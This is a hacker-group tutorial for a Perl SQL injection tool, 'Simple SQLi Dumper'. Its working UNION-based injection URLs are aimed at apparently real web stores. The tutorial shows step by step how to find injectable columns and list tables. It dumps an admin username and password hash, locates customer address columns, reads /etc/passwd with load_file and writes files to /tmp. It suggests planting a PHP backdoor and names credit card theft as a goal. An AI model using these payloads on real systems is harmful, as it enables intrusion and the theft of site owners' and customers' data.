| -p [http proxy] hostname:port |
|—————————————————————————–|
[o] proof of concept
[0x01] magic number (null column).
first of all we have to find null column (magic number).
null column used for execute our SQL query.
# perl ssdp.pl -u [target URL] -magic
[root@evilc0de noge]# perl ssdp.pl -u http://www.460productions.com/store.php?cat=2 -magic
[o]=================================================[x]
| Simple SQLi Dumper v5.1 |
| Coded by Vrs-hCk |
[o]=================================================[o]
Help Command: -h, -help, –help
[+] URL: http://www.460productions.com/store.php?cat=2
[+] End Tag: –
Attempting to find the magic number…
[+] Testing: 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,
[+] Field Length : 24
[+] Magic Number : 1
[+] URL Injection: http://www.460productions.com/store.php?cat=2+AND+1=2+UNION+ALL+SELECT+c0li,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24
Showing MySQL Information …
[+] Database: 460store
[+] User: i460usr@boscgi1002.eigbox.net
[+] Version: 5.0.51a-log
[+] System: redhat-linux-gnu
[+] Access to “mysql” Database: No
[+] Read File “/etc/passwd”: Yes (w00t)
[+] Create File “/tmp/c0li-430.txt”: Yes (w00t)
Done.
our magic number is 1 and it will replace with “c0li” string.
we can see the database information and operation system too.
[0x02] finding table
now we use URL that include “c0li” string on it to find table & column.
# perl ssdp.pl -u [c0li URL] -table
[root@evilc0de noge]# perl ssdp.pl -u http://www.460productions.com/store.php?cat=2+AND+1=2+UNION+ALL+SELECT+c0li,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 -table
[o]=================================================[x]
| Simple SQLi Dumper v5.1 |
| Coded by Vrs-hCk |
[o]=================================================[o]
Help Command: -h, -help, –help
[+] c0li SQLi URL: http://www.460productions.com/store.php?cat=2+AND+1=2+UNION+ALL+SELECT+c0li,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24
[+] SQLi End Tag: –
[+] Database Name: database()
[+] Number of Tables: 18
Showing tables …
[1] aspect_ratio(2)
[2] audio_format(3)
[3] category(7)
[4] customer(200)
[5] deposit(11)
[6] discount_group(9)
[7] discount_group_price(10)
[8] order()
[9] order_item(261)
[10] order_source(5)
[11] order_status(4)
[12] order_type(2)
[13] payment_type(4)
[14] product(30)
[15] product_group(17)
[16] security(1)
[17] shopping_cart(0)
[18] user_session(68)
Done.
that is the list of all table in database()
[0x03] finding column
let’s see column from table called “security”.
# perl ssdp.pl -u [c0li URL] -t [table] -column
[root@evilc0de noge]# perl ssdp.pl -u http://www.460productions.com/store.php?cat=2+AND+1=2+UNION+ALL+SELECT+c0li,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 -t security -column
[o]=================================================[x]
| Simple SQLi Dumper v5.1 |
| Coded by Vrs-hCk |
[o]=================================================[o]
Help Command: -h, -help, –help
[+] c0li SQLi URL: http://www.460productions.com/store.php?cat=2+AND+1=2+UNION+ALL+SELECT+c0li,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24
[+] SQLi End Tag: –
[+] Database Name: database()
[+] Table Name: security
[+] Number of Columns: 5
Showing columns from table “security” …
[+] security(1): user_id,username,password,admin,last_login
Done.
aha! we got column called “username” and “password”.
[0x04] dumping data
now we’ll see information inside that column.. :)
# perl ssdp.pl -u [c0li URL] -t [table] -c [column],[column] -dump
[root@evilc0de noge]# perl ssdp.pl -u http://www.460productions.com/store.php?cat=2+AND+1=2+UNION+ALL+SELECT+c0li,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 -t security -c username,password -dump
[o]=================================================[x]
| Simple SQLi Dumper v5.1 |
| Coded by Vrs-hCk |
[o]=================================================[o]
Help Command: -h, -help, –help
[+] c0li SQLi URL: http://www.460productions.com/store.php?cat=2+AND+1=2+UNION+ALL+SELECT+c0li,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24
[+] SQLi End Tag: –
[+] Database Name: database()
[+] Table Name: security
[+] Column Name: username,password
[+] Data Count: 1
Dumping Data …
[1] admin : 2ec20101734c754d
Done.
we got admin username and password hash. :D
ok i have show you how to find magic number, table, column and dump data the column using SSDp.
[0x05] search column name (-find)
now i’ll show you how to use -find option (Search Columns Name)
i’ll try to search column with keyword “address” it require -c option (column)
# perl ssdp.pl -u [c0li URL] -d [database name] -c [keyword] -find
[root@evilc0de noge]# perl ssdp.pl -u http://www.460productions.com/store.php?cat=2+AND+1=2+UNION+ALL+SELECT+c0li,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 -d 460store -c address -find
[o]=================================================[x]
| Simple SQLi Dumper v5.1 |
| Coded by Vrs-hCk |
[o]=================================================[o]
Help Command: -h, -help, –help
[+] c0li SQLi URL: http://www.460productions.com/store.php?cat=2+AND+1=2+UNION+ALL+SELECT+c0li,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24
[+] SQLi End Tag: –
[+] Database Name: 460store
[+] Column Name string to search: address
Searching for Columns Path …
[+] Columns Found:
[1] 460store.customer.email_address
[2] 460store.customer.address_line1
[3] 460store.customer.address_line2
[4] 460store.customer.address_city
[5] 460store.customer.address_state
[6] 460store.customer.address_zip
[7] 460store.customer.address_country
[8] 460store.customer.address_name
Done.
found column with word “address” on table “customer”. easy right? :p
[0x06] read & create file (read only)
now let’s see Read File (read only) & Create File (read only).
why read only? coz this function design just to test if we can read file or no. to inject, we do it manually.. :(
as you can see at the first time we find magic number you’ll find this line.
[+] Read File “/etc/passwd” : Yes (w00t)
[+] Create File “/tmp/c0li-159.txt” : Yes (w00t)
it means we can read (load_file) the /etc/passwd file on a target also we can create file at /tmp directory.
to use load_file you need to convert the /etc/passwd into hexadecimal. http://pacenoge.org/encdec
http://www.460productions.com/store.php?cat=2+AND+1=2+UNION+ALL+SELECT+1,2,3,4,5,6,load_file(0x2f6574632f706173737764),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24–
the result will be like this.
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
let’s create some file in /tmp directory. :)
http://www.460productions.com/store.php?cat=2+AND+1=2+UNION+ALL+SELECT+1,2,3,4,5,6,”Simple SQLi Dumper”,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+into+outfile+”/tmp/ssdp.txt”–
URL above means we write “Simple SQLi Dumper” into ssdp.txt that locate at /tmp directory.
to see if it works or no lets read /tmp/ssdp.txt using load_file function. don’t forget to convert it first.
http://www.460productions.com/store.php?cat=2+AND+1=2+UNION+ALL+SELECT+1,2,3,4,5,6,load_file(0x2f746d702f737364702e747874),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24–
and you will see result like this.
1 2 3 4 5 6 Simple SQLi Dumper 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24
that the word we write in /tmp/ssdp.txt.
what can we do with create file vuln? we can make a php file as backdoor at the target if we know the directory path. :) )
[0x07] brute MySQL v4
guessing table & column for MySQL v4.
you can add your own table name & column name by editing file called tables.dict & columns.dict.
# perl ssdp.pl -u [c0li URL] -brute
[root@evilc0de noge]# perl ssdp.pl -u http://www.samra.com/product_details.php?product_id=322+AND+1=2+UNION+ALL+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,c0li,33 -brute
[o]=================================================[x]
| Simple SQLi Dumper v5.1 |
| Coded by Vrs-hCk |
[o]=================================================[o]
Date : Sun Mar 21 19:31:42 2010
Help Command: -h, -help, –help
[+] c0li SQLi URL: http://www.samra.com/product_details.php?product_id=322+AND+1=2+UNION+ALL+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,c0li,33
[+] SQLi End Tag: –
Finding Tables & Columns …
[1] admin_user: username,password,email,adminid,adminname,phone,
Done.
found table “admin_user”
found column “username” “password” “email” “adminid” “adminname” “phone”
[0x08] conclusion
by using SSDp, it’s very easy to find SQL injection vulnerability at certain vulnerable parameter or string.
this tool also perform SQL injection test to the vulnerable website and try to dump data from MySQL database.
you can dump data from MySQL database columns and it works nicely.
you can gather secret and confidential data such as usernames, passwords, credit card numbers and etc.
but, i suggest using this tool in a right way. okey dude?? :p
[0x09] references
perl ssdp.pl -h
http://en.wikipedia.org/wiki/SQL_injection
http://ferruh.mavituna.com/sql-injection-cheatsheet-oku/
[0x10] greetz ^^
SSDp coded by Vrs-hCk ( ander[at]antisecurity[dot]org )
SSDp How To by NoGe ( mario[at]antisecurity[dot]org )
Vrs-hCk OoN_Boy paman zxvf angel stardustmemory
s4va xr00tb0y S3T4N pizzyroot matthews martfella